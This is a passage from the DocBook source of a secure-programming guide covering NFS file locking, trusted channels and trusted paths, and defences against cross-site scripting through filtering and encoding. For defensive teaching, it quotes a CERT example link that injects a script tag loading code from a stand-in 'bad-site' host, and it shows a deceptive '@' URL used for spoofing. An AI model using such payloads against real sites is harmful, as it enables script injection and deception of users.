Second, if the lock file may be on an NFS-mounted filesystem, then you have
|
||
the problem that NFS version 2 doesn't completely support normal file semantics.
|
||
This can even be a problem for work that's supposed to be ``local'' to a
|
||
client, since some clients don't have local disks and may have <emphasis remap="it">all</emphasis>
|
||
files remotely mounted via NFS.
|
||
The manual for <emphasis remap="it">open(2)</emphasis> explains how to handle things in this case
|
||
(which also handles the case of root programs):
|
||
</para>
|
||
|
||
<para>
|
||
<QUOTE>... programs which rely on
|
||
[the O_CREAT and O_EXCL flags of open(2) to work on
|
||
filesystems accessed via NFS version 2]
|
||
for performing locking tasks will contain a race condition. The solution
|
||
for performing atomic file locking using a lockfile is to create
|
||
a unique file on the same filesystem (e.g., incorporating
|
||
hostname and pid), use link(2) to make a link to
|
||
the lockfile and use stat(2) on the unique file to
|
||
check if its link count has increased to 2. Do
|
||
not use the return value of the link(2) call.</QUOTE>
|
||
</para>
|
||
|
||
<para>
|
||
Obviously, this solution only works if all programs doing the locking
|
||
are cooperating, and if all non-cooperating programs aren't allowed to
|
||
interfere.
|
||
In particular, the directories you're using for file locking
|
||
must not have permissive file permissions for creating and removing files.
|
||
</para>
|
||
|
||
<para>
|
||
NFS version 3 added support for O_EXCL mode in open(2);
|
||
see IETF RFC 1813,
|
||
in particular the "EXCLUSIVE" value to the "mode" argument of "CREATE".
|
||
Sadly, not everyone has switched to NFS version 3 or higher at the time of this
|
||
writing, so you can't depend on this yet in portable programs.
|
||
Still, in the long run there's hope that this issue will go away.
|
||
</para>
|
||
|
||
<para>
|
||
If you're locking a device or the existence of a process on a local
|
||
machine, try to use standard conventions.
|
||
I recommend using the Filesystem Hierarchy Standard (FHS);
|
||
it is widely referenced by Linux systems, but it also tries to incorporate
|
||
the ideas of other Unix-like systems.
|
||
The FHS describes
|
||
standard conventions for such locking files, including naming, placement,
|
||
and standard contents of these files [FHS 1997].
|
||
If you just want to be sure that your server doesn't execute more than once
|
||
on a given machine, you should usually create a process identifier as
|
||
/var/run/NAME.pid with the pid as its contents.
|
||
In a similar vein, you should place lock files for things
|
||
like device lock files in /var/lock.
|
||
This approach has the minor disadvantage of leaving files hanging around
|
||
if the program suddenly halts,
|
||
but it's standard practice and that problem is
|
||
easily handled by other system tools.
|
||
</para>
|
||
|
||
<para>
|
||
It's important that the programs which are cooperating using files to
|
||
represent the locks use the same
|
||
directory, not just the same directory name.
|
||
This is an issue with networked systems: the FHS explicitly notes that
|
||
/var/run and /var/lock are unshareable, while /var/mail is shareable.
|
||
Thus, if you want the lock to work on a single machine, but not interfere
|
||
with other machines, use unshareable directories like /var/run
|
||
(e.g., you want to permit each machine to run its own server).
|
||
However, if you want all machines sharing files in a network to obey the
|
||
lock, you need to use a directory that they're sharing; /var/mail is
|
||
one such location. See FHS section 2 for more information on this subject.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
<sect3 id="other-locking">
|
||
<title>Other Approaches to Locking</title>
|
||
|
||
<para>
|
||
Of course, you need not use files to represent locks.
|
||
Network servers often need not bother; the mere act of binding to a port
|
||
acts as a kind of lock, since if there's an existing server bound to a given
|
||
port, no other server will be able to bind to that port.
|
||
</para>
|
||
|
||
<para>
|
||
Another approach to locking
|
||
is to use POSIX record locks, implemented through fcntl(2) as a
|
||
``discretionary lock''.
|
||
These are discretionary, that is, using them requires the cooperation of the
|
||
programs needing the locks (just as the approach to using files to
|
||
represent locks does).
|
||
There's a lot to recommend POSIX record locks:
|
||
POSIX record locking is supported on nearly all Unix-like platforms
|
||
(it's mandated by POSIX.1), it
|
||
can lock portions of a file (not just a whole file), and it can handle the
|
||
difference between read locks and write locks.
|
||
Even more usefully, if a process dies, its locks are automatically removed,
|
||
which is usually what is desired.
|
||
<!-- ???: What about locking across NFS, flock, lockf?
|
||
XBoing doc file "problems.txt" says that lockf() works over NFS when
|
||
lockd daemon is running. -->
|
||
</para>
|
||
|
||
<para>
|
||
You can also use mandatory locks, which are based on System V's
|
||
mandatory locking scheme.
|
||
These only apply to files where the locked file's setgid bit is set, but
|
||
the group execute bit is not set.
|
||
Also, you must mount the filesystem to permit mandatory file locks.
|
||
In this case, every read(2) and write(2) is checked for locking;
|
||
while this is more thorough than advisory locks, it's also slower.
|
||
Also, mandatory locks don't port as widely to other Unix-like systems
|
||
(they're available on Linux and System V-based systems, but not necessarily
|
||
on others).
|
||
Note that processes with root privileges
|
||
can be held up by a mandatory lock, too, making it possible that
|
||
this could be the basis of a denial-of-service attack.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="trustworthy-channels">
|
||
<title>Trust Only Trustworthy Channels</title>
|
||
|
||
<para>
|
||
In general, only trust information (input or results)
|
||
from trustworthy channels.
|
||
For example,
|
||
the routines getlogin(3) and ttyname(3) return information that can be
|
||
controlled by a local user, so don't trust them for security purposes.
|
||
</para>
|
||
|
||
<para>
|
||
In most computer networks (and certainly for the Internet at large),
|
||
no unauthenticated transmission is trustworthy.
|
||
For example,
|
||
packets sent over the public Internet can be viewed and modified at any
|
||
point along their path, and arbitrary new packets can be forged.
|
||
These forged packets might include forged information about the sender
|
||
(such as their machine (IP) address and port) or receiver.
|
||
Therefore, don't use these values as your primary criteria for
|
||
security decisions unless you can authenticate them (say using cryptography).
|
||
</para>
|
||
|
||
<para>
|
||
This means that, except under special circumstances,
|
||
two old techniques for authenticating users
|
||
in TCP/IP should often not be used as the sole authentication mechanism.
|
||
One technique is to limit users to ``certain machines'' by checking
|
||
the ``from'' machine address in a data packet; the other is to
|
||
limit access by requiring that the sender use a ``trusted'' port number
|
||
(a number less that 1024).
|
||
The problem is that in many environments an attacker can forge these values.
|
||
</para>
|
||
|
||
<para>
|
||
In some environments, checking these values (e.g., the sending machine
|
||
IP address and/or port) can have some value, so
|
||
it's not a bad idea to support such checking as an option in a program.
|
||
For example, if a system runs behind a firewall, the firewall can't
|
||
be breached or circumvented, and the firewall stops
|
||
external packets that claim to be from the inside,
|
||
then you can claim that any packet saying it's from the inside really does.
|
||
Note that you can't be sure the packet actually comes from the machine
|
||
it claims it comes from - so you're only countering external threats,
|
||
not internal threats.
|
||
However, broken firewalls, alternative paths, and mobile code make
|
||
even these assumptions suspect.
|
||
</para>
|
||
|
||
<para>
|
||
The problem is supporting untrustworthy information as the only way
|
||
to authenticate someone.
|
||
If you need a trustworthy channel over an untrusted network,
|
||
in general you need some sort of cryptologic
|
||
service (at the very least, a cryptologically safe hash).
|
||
See <xref linkend="crypto">
|
||
for more information on cryptographic algorithms and protocols.
|
||
If you're implementing a standard and inherently insecure protocol
|
||
(e.g., ftp and rlogin), provide safe defaults and document
|
||
the assumptions clearly.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
The Domain Name Server (DNS) is widely used on the Internet to maintain
|
||
mappings between the names of computers and their IP (numeric) addresses.
|
||
The technique called ``reverse DNS'' eliminates some simple
|
||
spoofing attacks, and is useful for determining a host's name.
|
||
However, this technique is not trustworthy for authentication decisions.
|
||
The problem is that, in the end, a DNS request will be sent eventually
|
||
to some remote system that may be controlled by an attacker.
|
||
Therefore, treat DNS results as an input that needs
|
||
validation and don't trust it for serious access control.
|
||
</para>
|
||
|
||
<para>
|
||
Arbitrary email (including the ``from'' value of addresses)
|
||
can be forged as well.
|
||
Using digital signatures is a method to thwart many such attacks.
|
||
A more easily thwarted approach is to require emailing back and forth
|
||
with special randomly-created values, but for low-value transactions
|
||
such as signing onto a public mailing list this is usually acceptable.
|
||
</para>
|
||
|
||
<para>
|
||
Note that in any client/server model, including CGI, that the server
|
||
must assume that the client (or someone interposing between the
|
||
client and server) can modify any value.
|
||
For example, so-called ``hidden fields'' and cookie values can be
|
||
changed by the client before being received by CGI programs.
|
||
These cannot be trusted unless special precautions are taken.
|
||
For example, the hidden fields could be signed in a way the client
|
||
cannot forge as long as the server checks the signature.
|
||
The hidden fields could also be encrypted using a key only the trusted
|
||
server could decrypt (this latter approach is the basic idea behind the
|
||
Kerberos authentication system).
|
||
InfoSec labs has further discussion about hidden fields and applying
|
||
encryption at
|
||
<ulink url="http://www.infoseclabs.com/mschff/mschff.htm">http://www.infoseclabs.com/mschff/mschff.htm</ulink>.
|
||
In general, you're better off keeping data you care about at the server end
|
||
in a client/server model.
|
||
In the same vein,
|
||
don't depend on HTTP_REFERER for authentication in a CGI program, because
|
||
this is sent by the user's browser (not the web server).
|
||
</para>
|
||
|
||
<para>
|
||
This issue applies to data referencing other data, too.
|
||
For example, HTML or XML allow you to include by reference other files
|
||
(e.g., DTDs and style sheets) that may be stored remotely.
|
||
However, those external references could be modified so that users
|
||
see a very different document than intended;
|
||
a style sheet could be modified to ``white out'' words at critical
|
||
locations, deface its appearance, or insert new text.
|
||
External DTDs could be modified to prevent use of the document
|
||
(by adding declarations that break validation) or insert different
|
||
text into documents [St. Laurent 2000].
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="trusted-path">
|
||
<title>Set up a Trusted Path</title>
|
||
<para>
|
||
The counterpart to needing trustworthy channels
|
||
(see <xref linkend="trustworthy-channels">)
|
||
is assuring users that they
|
||
really are working with the program or system they intended to use.
|
||
</para>
|
||
|
||
<para>
|
||
The traditional example is a ``fake login'' program.
|
||
If a program is written to look like the login screen of a system, then
|
||
it can be left running.
|
||
When users try to log in, the fake login program can then capture user
|
||
passwords for later use.
|
||
</para>
|
||
|
||
<para>
|
||
A solution to this problem is a ``trusted path.''
|
||
A trusted path is simply some mechanism that provides confidence that the
|
||
user is communicating with what the user intended to communicate with,
|
||
ensuring that attackers can't intercept or modify whatever information
|
||
is being communicated.
|
||
<!-- A gross simplification of the CC. See:
|
||
http://www.commoncriteria.org/cc/part2/part2anftp.html -->
|
||
</para>
|
||
|
||
<para>
|
||
If you're asking for a password, try to set up trusted path.
|
||
Unfortunately, stock Linux distributions and many other Unixes don't
|
||
have a trusted path even for their normal login sequence.
|
||
One approach is to
|
||
require pressing an unforgeable key before login, e.g.,
|
||
Windows NT/2000 uses ``control-alt-delete'' before logging in; since
|
||
normal programs in Windows can't intercept this key pattern, this
|
||
approach creates a trusted path.
|
||
There's a Linux equivalent, termed the
|
||
<ulink url="http://lwn.net/2001/0322/a/SAK.php3">Secure Attention Key
|
||
(SAK)</ulink>; it's recommended that this be mapped to
|
||
``control-alt-pause''.
|
||
Unfortunately, at the time of this writing SAK is immature and not
|
||
well-supported by Linux distributions.
|
||
Another approach for implementing a trusted path
|
||
locally is to control a separate display that only the login
|
||
program can perform.
|
||
For example, if only trusted programs could modify the keyboard lights
|
||
(the LEDs showing Num Lock, Caps Lock, and Scroll Lock),
|
||
then a login program could display a running pattern to indicate that
|
||
it's the real login program.
|
||
Unfortunately, since in current Linux normal users can change the LEDs,
|
||
the LEDs can't currently be used to confirm a trusted path.
|
||
</para>
|
||
|
||
<para>
|
||
Sadly, the problem is much worse for network applications.
|
||
Although setting up a trusted path is desirable for network applications,
|
||
completely doing so is quite difficult.
|
||
When sending a password over a network, at the very least
|
||
encrypt the password between trusted endpoints.
|
||
This will at least prevent eavesdropping of passwords by those not
|
||
connected to the system, and at least make attacks harder to perform.
|
||
If you're concerned about trusted path for the actual communication, make
|
||
sure that the communication is
|
||
encrypted and authenticated (or at least authenticated).
|
||
</para>
|
||
|
||
<para>
|
||
It turns out that this isn't enough to have a trusted path
|
||
to networked applications, in particular for web-based applications.
|
||
There are documented methods for fooling users of web browsers into thinking
|
||
that they're at one place when they are really at another.
|
||
For example, Felten [1997] discusses ``web spoofing'',
|
||
where users believe they're viewing one web page when in fact all the
|
||
web pages they view go through an attacker's site (who can then monitor
|
||
all traffic and modify any data sent in either direction).
|
||
This is accomplished by rewriting URL.
|
||
The rewritten URLs can be made nearly invisible
|
||
by using other technology (such as Javascript) to hide any possible
|
||
evidence in the status line, location line, and so on.
|
||
See their paper for more details.
|
||
Another technique for hiding such URLs is exploiting rarely-used URL
|
||
syntax, for example, the URL
|
||
``http://www.ibm.com/stuff@mysite.com''
|
||
is actually a request to view ``mysite.com'' (a potentially malevolent site)
|
||
using the unusual username ``www.ibm.com/stuff'.
|
||
If the URL is long enough,
|
||
the real material won't be displayed and users are unlikely to
|
||
notice the exploit anyway.
|
||
Yet another approach is to create sites with names deliberately similar
|
||
to the ``real'' site - users may not know the difference.
|
||
In all of these cases, simply encrypting the line doesn't help -
|
||
the attacker can be quite content in encrypting data while completely
|
||
controlling what's shown.
|
||
</para>
|
||
|
||
<para>
|
||
Countering these problems is more difficult;
|
||
at this time I have no good technical solution for fully preventing
|
||
``fooled'' web users.
|
||
I would encourage web browser developers to counter such ``fooling'',
|
||
making it easier to spot.
|
||
If it's critical that your users correctly connect to the correct site,
|
||
have them use simple procedures to counter the threat.
|
||
Examples include having them halt and restart their browser, and making sure
|
||
that the web address is very simple and not normally misspelled
|
||
(so misspelling it is unlikely).
|
||
You might also want to gain ownership of some ``similar'' sounding DNS names,
|
||
and search for other such DNS names and material to find attackers.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="internal-check">
|
||
<title>Use Internal Consistency-Checking Code</title>
|
||
|
||
<para>
|
||
The program should check to ensure that its call arguments and basic state
|
||
assumptions are valid.
|
||
In C, macros such as assert(3) may be helpful in doing so.
|
||
<!-- ??? See programming by contract, championed in Eiffel,
|
||
and info on formal proofs. -->
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="self-limit-resources">
|
||
<title>Self-limit Resources</title>
|
||
|
||
<para>
|
||
In network daemons, shed or limit excessive loads.
|
||
Set limit values (using setrlimit(2)) to limit the resources that will be used.
|
||
At the least, use setrlimit(2) to disable creation of ``core'' files.
|
||
For example, by default
|
||
Linux will create a core file that saves all program memory if the
|
||
program fails abnormally, but such a file might include passwords or
|
||
other sensitive data.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="cross-site-malicious-content">
|
||
<title>Prevent Cross-Site (XSS) Malicious Content</title>
|
||
<para>
|
||
Some secure programs accept data from one untrusted user (the attacker)
|
||
and pass that data on to a different user's application (the victim).
|
||
If the secure program doesn't protect the victim, the
|
||
victim's application (e.g., their web browser)
|
||
may then process that data in a way harmful to the victim.
|
||
This is a particularly common problem for web applications using HTML or XML,
|
||
where the problem goes by several names including ``cross-site scripting'',
|
||
``malicious HTML tags'', and ``malicious content.''
|
||
This book will call this problem ``cross-site malicious content,''
|
||
since the problem isn't limited to scripts or HTML, and its cross-site nature
|
||
is fundamental.
|
||
Note that this problem isn't limited to web applications, but since
|
||
this is a particular problem for them, the rest of this discussion
|
||
will emphasize web applications.
|
||
As will be shown in a moment, sometimes an attacker can cause a victim
|
||
to send data from the victim to the secure program, so the secure program
|
||
must protect the victim from himself.
|
||
</para>
|
||
|
||
<sect2 id="explain-cross-site">
|
||
<title>Explanation of the Problem</title>
|
||
|
||
<para>
|
||
Let's begin with a simple example.
|
||
Some web applications are designed to
|
||
permit HTML tags in data input from users that will later
|
||
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
|
||
If nothing is done to prevent it,
|
||
these tags can be used by malicious users to attack other users by inserting
|
||
scripts,
|
||
Java references (including references to hostile applets), DHTML tags,
|
||
early document endings (via </HTML>), absurd font size requests,
|
||
and so on.
|
||
This capability can be exploited for a wide range of effects,
|
||
such as exposing SSL-encrypted connections, accessing restricted web
|
||
sites via the client, violating domain-based security policies,
|
||
making the web page unreadable,
|
||
making the web page unpleasant to use (e.g., via annoying banners
|
||
and offensive material),
|
||
permit privacy intrusions (e.g., by inserting a web bug to learn exactly
|
||
who reads a certain page),
|
||
creating
|
||
denial-of-service attacks (e.g., by creating an ``infinite'' number
|
||
of windows), and even very destructive attacks (by inserting
|
||
attacks on security vulnerabilities such as scripting languages or
|
||
buffer overflows in browsers).
|
||
By embedding malicious FORM tags at the right place, an intruder
|
||
may even be able to trick users into revealing sensitive information
|
||
(by modifying the behavior of an existing form).
|
||
Or, by embedding scripts, an intruder can cause no end of problems.
|
||
This is by no means an exhaustive list of problems, but
|
||
hopefully this is enough to convince you that this is a serious problem.
|
||
</para>
|
||
|
||
<para>
|
||
Most ``discussion boards'' have already discovered this problem,
|
||
and most already take steps to prevent it in text intended to be part of
|
||
a multiperson discussion.
|
||
Unfortunately, many web application developers don't
|
||
realize that this is a much more general problem.
|
||
<emphasis>Every</emphasis> data value that is sent from one
|
||
user to another can potentially be a source for cross-site
|
||
malicious posting, even if it's not an ``obvious'' case of an area
|
||
where arbitrary HTML is expected.
|
||
The malicious data can even be supplied by the user himself, since the
|
||
user may have been fooled into supplying the data via another site.
|
||
Here's an example (from CERT) of an HTML link that causes the user to
|
||
send malicious data to another site:
|
||
<programlisting>
|
||
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT
|
||
SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
In short, a web application cannot accept input (including any form data)
|
||
without checking, filtering, or encoding it.
|
||
You can't even pass that data back to the same user in many cases
|
||
in web applications, since another user may have surreptitiously
|
||
supplied the data.
|
||
Even if permitting such material won't hurt your system, it will
|
||
enable your system to be a conduit of attacks to your users.
|
||
Even worse, those attacks will appear to be coming from your system.
|
||
</para>
|
||
|
||
<para>
|
||
CERT describes the problem this way in their advisory:
|
||
<blockquote><para>
|
||
A web site may inadvertently include malicious HTML tags or script
|
||
in a dynamically generated page based on unvalidated input
|
||
from untrustworthy sources
|
||
(<ulink url="http://www.cert.org/advisories/CA-2000-02.html">CERT Advisory
|
||
CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests</ulink>).
|
||
</para></blockquote>
|
||
More information from CERT about this is available at
|
||
<ulink url="http://www.cert.org/archive/pdf/cross_site_scripting.pdf">
|
||
http://www.cert.org/archive/pdf/cross_site_scripting.pdf</ulink>.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="solutions-cross-site">
|
||
<title>Solutions to Cross-Site Malicious Content</title>
|
||
<para>
|
||
Fundamentally, this means that all web application output impacted
|
||
by any user must be
|
||
filtered (so characters that can cause this problem are removed),
|
||
encoded (so the characters that can cause this problem are encoded in
|
||
a way to prevent the problem), or
|
||
validated (to ensure that only ``safe'' data gets through).
|
||
This includes all output derived from
|
||
input such as URL parameters, form data, cookies,
|
||
database queries, CORBA ORB results, and data from users stored in files.
|
||
In many cases,
|
||
filtering and validation should be done at the input, but
|
||
encoding can be done during either input validation or output generation.
|
||
If you're just passing the data through without analysis, it's probably
|
||
better to encode the data on input (so it won't be forgotten).
|
||
However, if your program processes the data,
|
||
it can be easier to encode it on output instead.
|
||
CERT recommends that filtering and encoding be done during data output;
|
||
this isn't a bad idea, but there are many cases where it makes sense to do it
|
||
at input instead.
|
||
The critical issue is to make sure that you cover all cases for
|
||
every output, which is not an easy thing to do regardless of approach.
|
||
</para>
|
||
|
||
<para>
|
||
Warning - in many cases these techniques can be subverted unless you've also
|
||
gained control over the character encoding of the output.
|
||
Otherwise, an attacker could use an ``unexpected'' character encoding
|
||
to subvert the techniques discussed here.
|
||
Thankfully, this isn't hard;
|
||
gaining control over output character encoding is discussed in
|
||
<xref linkend="output-character-encoding">.
|
||
</para>
|
||
|
||
<para>
|
||
One minor defense, that's often worth doing, is the "HttpOnly" flag for
|
||
cookies.
|
||
Scripts that run in a web browser cannot access cookie values
|
||
that have the HttpOnly flag set (they just get an empty value instead).
|
||
This is currently implemented in
|
||
Microsoft Internet Explorer, and I expect
|
||
Mozilla/Netscape to implement this soon too.
|
||
<!-- http://online.securityfocus.com/archive/1/299331/2002-11-09/2002-11-15/0 -->
|
||
<!-- http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp -->
|
||
You should set HttpOnly on for any cookie you send, unless you have
|
||
scripts that need the cookie, to counter certain kinds of cross-site
|
||
scripting (XSS) attacks.
|
||
However, the HttpOnly flag can be circumvented in a variety of ways,
|
||
so using as your primary defense is inappropriate.
|
||
Instead, it's a helpful secondary defense that may help save you in
|
||
case your application is written incorrectly.
|
||
<!-- See http://www.whitehatsec.com/news.html
|
||
http://www.extremetech.com/article2/0,3973,841047,00.asp
|
||
and the Bugtraq discussion, 23 Jan 2003.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
The first subsection below discusses how to identify special
|
||
characters that need to be filtered, encoded, or validated.
|
||
This is followed by subsections describing
|
||
how to filter or encode these characters.
|
||
There's no subsection discussing how to validate data in general,
|
||
however, for input validation in general see <xref linkend="input">,
|
||
and if the input is straight HTML text or a URI, see
|
||
<xref linkend="filter-html">.
|
||
Also note that your web application can receive malicious cross-postings,
|
||
so non-queries should forbid the GET protocol
|
||
(see <xref linkend="avoid-get-non-queries">).
|
||
</para>
|
||
|
||
<sect3>
|
||
<title>Identifying Special Characters</title>
|
||
<para>
|
||
Here are the special characters for a variety of circumstances
|
||
(my thanks to the CERT, who developed this list):
|
||
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
In the content of a block-level element (e.g.,
|
||
in the middle of a paragraph of text in HTML or a block in XML):
|
||
<itemizedlist>
|
||
<listitem><para>"<" is special because it introduces a tag.</para></listitem>
|
||
<listitem><para>"&" is special because it introduces a character entity.</para></listitem>
|
||
<listitem><para>">" is special because some browsers treat it as special,
|
||
on the assumption that the author of the page really meant
|
||
to put in an opening "<", but omitted it in error.</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
In attribute values:
|
||
<itemizedlist>
|
||
<listitem><para>In attribute values enclosed with double quotes, the
|
||
double quotes are special because they mark the end of the attribute value.
|
||
</para></listitem>
|
||
<listitem><para>In attribute values enclosed with single quote, the single
|
||
quotes are special because they mark the end of the attribute value.
|
||
XML's definition allows single quotes, but I've been told that some
|
||
XML parsers don't handle them correctly, so you might avoid
|
||
using single quotes in XML.
|
||
<!--
|
||
The CERT advisory at
|
||
http://www.cert.org/tech_tips/malicious_code_mitigation.html
|
||
once said they weren't legal; Daniel Naber noted that
|
||
this sentence isn't there now:
|
||
|
||
"Note that these aren't legal in XML, so I would recommend not using these."
|
||
-->
|
||
</para></listitem>
|
||
<listitem><para>Attribute values without any quotes make the white-space
|
||
characters such as space and tab special.
|
||
Note that these aren't legal in XML either, <emphasis>and</emphasis>
|
||
they make more characters special.
|
||
Thus, I recommend against unquoted attributes if you're using
|
||
dynamically generated values in them.
|
||
</para></listitem>
|
||
<listitem><para>"&" is special when used in conjunction with
|
||
some attributes because it introduces a character entity.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
In URLs, for example, a search engine might provide a link within
|
||
the results page that the user can click to re-run the search. This
|
||
can be implemented by encoding the search query inside the URL. When
|
||
this is done, it introduces additional special characters:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Space, tab, and new line are special because they mark the
|
||
end of the URL.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
"&" is special because it introduces a character
|
||
entity or separates CGI parameters.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Non-ASCII characters (that is, everything above 128 in the
|
||
ISO-8859-1 encoding) aren't allowed in URLs, so they are all
|
||
special here.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
The "%" must be filtered from input anywhere parameters
|
||
encoded with HTTP escape sequences are decoded by server-side
|
||
code. The percent must be filtered if input such as
|
||
"%68%65%6C%6C%6F" becomes "hello" when it appears on the web
|
||
page in question.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Within the body of a <SCRIPT> </SCRIPT>
|
||
the semicolon, parenthesis, curly braces, and new line
|
||
should be filtered in situations where text could be inserted
|
||
directly into a preexisting script tag.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Server-side scripts that convert any exclamation
|
||
characters (!) in input to double-quote characters (") on
|
||
output might require additional filtering.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
Note that, in general, the ampersand (&) is special in HTML and XML.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
<sect3>
|
||
<title>Filtering</title>
|
||
<para>
|
||
One approach to handling these special characters is simply
|
||
eliminating them (usually during input or output).
|
||
</para>
|
||
|
||
<para>
|
||
If you're already validating your input for valid characters
|
||
(and you generally should), this is easily done by simply omitting the
|
||
special characters from the list of valid characters.
|
||
Here's an example in Perl of a filter that only accepts legal
|
||
characters, and since the filter doesn't accept any special characters
|
||
other than the space, it's quite acceptable for use in areas such as
|
||
a quoted attribute:
|
||
<programlisting>
|
||
# Accept only legal characters:
|
||
$summary =~ tr/A-Za-z0-9\ \.\://dc;
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
However, if you really want to strip away <emphasis>only</emphasis>
|
||
the smallest number of characters, then you could create a subroutine
|
||
to remove just those characters:
|
||
<programlisting>
|
||
sub remove_special_chars {
|
||
local($s) = @_;
|
||
$s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;
|
||
return $s;
|
||
}
|
||
# Sample use:
|
||
$data = &remove_special_chars($data);
|
||
</programlisting>
|
||
</para>
|
||
</sect3>
|
||
|
||
<sect3>
|
||
<title>Encoding (Quoting)</title>
|
||
<para>
|
||
An alternative to removing the special characters is to encode them
|
||
so that they don't have any special meaning.
|
||
This has several advantages over filtering the characters,
|
||
in particular, it prevents data loss.
|
||
If the data is "mangled" by the process from the user's point of view,
|
||
at least when the data is encoded it's possible to reconstruct the
|
||
data that was originally sent.
|
||
</para>
|
||
|
||
<para>
|
||
HTML, XML, and SGML all use the ampersand ("&") character as a
|
||
way to introduce encodings in the running text; this encoding
|
||
is often called ``HTML encoding.''
|
||
To encode these characters, simply transform the special characters
|
||
in your circumstance. Usually this means
|
||
'<' becomes '&lt;',
|
||
'>' becomes '&gt;',
|
||
'&' becomes '&amp;', and
|
||
'"' becomes '&quot;'.
|
||
As noted above, although in theory '>' doesn't need to be quoted,
|
||
because some browsers act on it (and fill in a '<') it needs to be quoted.
|
||
There's a minor complexity with the double-quote character,
|
||
because '&quot;' only needs to be
|
||
used inside attributes, and some extremely old browsers don't
|
||
properly render it.
|
||
If you can handle the additional complexity, you can try to encode '"'
|
||
only when you need to, but it's easier to simply encode it and ask
|
||
users to upgrade their browsers.
|
||
Few users will use such ancient browsers, and the double-quote character
|
||
encoding has been a standard for a long time.
|
||
</para>
|
||
|
||
<para>
|
||
Scripting languages may consider implementing specialized auto-quoting types,
|
||
the interesting approach developed in the web application framework
|
||
<ulink url="http://www.mems-exchange.org/software/quixote">Quixote</ulink>.
|
||
Quixote includes a "template" feature which allows easy mixing of HTML text
|
||
and Python code; text generated by a template is passed back to the web browser
|
||
as an HTML document.
|
||
As of version 0.6, Quixote has two kinds of text (instead of a single
|
||
kind as most such languages).
|
||
Anything which appears in a literal, quoted string is of type "htmltext,"
|
||
and it is assumed to be exactly as the programmer wanted it to be
|
||
(this is reasoble, since the programmer wrote it).
|
||
Anything which takes the form of an ordinary Python string, however,
|
||
is automatically quoted as the template is executed.
|
||
As a result, text from a database or other external source is
|
||
automatically quoted, and cannot be used for a cross-site scripting attack.
|
||
Thus, Quixote implements a safe default -
|
||
programmers no longer need to worry about quoting every bit of text
|
||
that passes through the application (bugs involving too much quoting
|
||
are less likely to be a security problem, and will be obvious in testing).
|
||
Quixote uses an open source software license, but because of its
|
||
venue identification it is probably GPL-incompatible, and is used by
|
||
organizations such as the
|
||
<ulink url="http://lwn.net">Linux Weekly News</ulink>.
|
||
<!-- See http://lwn.net/Articles/19552/ -->
|
||
</para>
|
||
|
||
<para>
|
||
This approach to HTML encoding
|
||
isn't quite enough encoding in some circumstances.
|
||
As discussed in <xref linkend="output-character-encoding">,
|
||
you need to specify the output character encoding (the ``charset'').
|
||
<!-- A list of character encodings is at
|
||
ftp://ftp.isi.edu/in-notes/iana/assignments/character-sets; this
|
||
is referenced in the HTML 4.01 spec -->
|
||
If some of your data is encoded using a different character encoding
|
||
than the output character encoding, then you'll need to do something so your
|
||
output uses a consistent and correct encoding.
|
||
Also, you've selected an output encoding other than
|
||
ISO-8859-1, then you need to
|
||
make sure that any alternative encodings for special characters
|
||
(such as "<") can't slip through to the browser.
|
||
This is a problem with several character encodings, including popular ones
|
||
like UTF-7 and UTF-8; see <xref linkend="character-encoding">
|
||
for more information on how to prevent ``alternative'' encodings of characters.
|
||
<!-- Is it possible to slip through even with ISO-8859-1? I don't see
|
||
a way to do it, so I'm not raising that concern. -->
|
||
One way to deal with incompatible character encodings is to
|
||
first translate the characters internally to ISO 10646 (which has
|
||
the same character values as Unicode), and then
|
||
using either numeric character references or character entity
|
||
references to represent them:
|
||
<itemizedlist>
|
||
<listitem><para>A numeric character reference looks like
|
||
"&#D;", where D is a decimal number, or
|
||
"&#xH;" or "&#XH;", where H is a hexadecimal number.
|
||
The number given is the ISO 10646 character id (which has the same character
|
||
values as Unicode).
|
||
Thus &#1048; is the Cyrillic capital letter "I".
|
||
The hexadecimal system isn't supported in the SGML standard (ISO 8879),
|
||
so I'd suggest using the decimal system for output.
|
||
Also, although SGML specification
|
||
permits the trailing semicolon to be omitted in
|
||
some circumstances, in practice many systems don't handle it - so
|
||
always include the trailing semicolon.
|
||
</para></listitem>
|
||
<listitem><para>A character entity reference does the same thing but
|
||
uses mnemonic names instead of numbers.
|
||
For example, "&lt;" represents the < sign.
|
||
If you're generating HTML, see the
|
||
<ulink url="http://www.w3.org">HTML specification</ulink> which
|
||
lists all mnemonic names.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Either system (numeric or character entity)
|
||
works; I suggest using character entity references for
|
||
'<', '>', '&', and '"' because it makes your code (and output)
|
||
easier for humans to understand. Other than that, it's not clear
|
||
that one or the other system is uniformly better.
|
||
